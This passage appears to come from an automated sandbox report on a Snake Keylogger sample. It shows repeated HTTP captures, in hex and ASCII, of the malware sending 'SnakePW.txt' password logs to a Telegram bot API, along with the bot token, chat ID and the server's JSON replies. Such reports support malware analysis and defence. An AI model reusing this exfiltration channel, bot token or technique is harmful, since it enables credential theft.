                                                                    2022-06-26 07:32:39 UTC3OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 64 34 62 63 32 39 30 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756d4bc2909Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:32:39 UTC4INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:32:39 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 509
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:32:39 UTC4INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 37 34 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 35 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66748,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228759,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    20192.168.2.549788149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:32:46 UTC33OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756d9348fb3
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:32:46 UTC34OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 64 39 33 34 38 66 62 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756d9348fb3Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:32:46 UTC34INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:32:46 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:32:46 UTC34INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 37 36 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 36 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66767,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228766,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    200192.168.2.550085149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:34:03 UTC337OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da57570739440e
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:34:03 UTC338OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 30 37 33 39 34 34 30 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da57570739440eContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:34:04 UTC338INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:34:04 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:34:04 UTC338INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 34 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66972,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228844,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    201192.168.2.550087149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:34:04 UTC339OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da57570774df27
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:34:04 UTC339OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 30 37 37 34 64 66 32 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da57570774df27Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:34:04 UTC340INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:34:04 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:34:04 UTC340INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 37 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 34 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66974,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228844,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    202192.168.2.550088149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:34:04 UTC341OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da575707b2db3c
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:34:04 UTC341OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 30 37 62 32 64 62 33 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da575707b2db3cContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:34:04 UTC341INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:34:04 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:34:04 UTC342INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 37 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 34 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66975,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228844,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    203192.168.2.550091149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:34:05 UTC342OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da575707f0d815
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:34:05 UTC343OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 30 37 66 30 64 38 31 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da575707f0d815Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:34:05 UTC343INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:34:05 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:34:05 UTC344INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 37 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 34 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66976,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228845,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    204192.168.2.550094149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:34:05 UTC344OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5757082c7276
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:34:05 UTC344OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 30 38 32 63 37 32 37 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5757082c7276Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:34:05 UTC345INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:34:05 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:34:05 UTC345INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 37 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 34 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66977,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228845,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    205192.168.2.550095149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:34:05 UTC346OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5757086a6f82
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
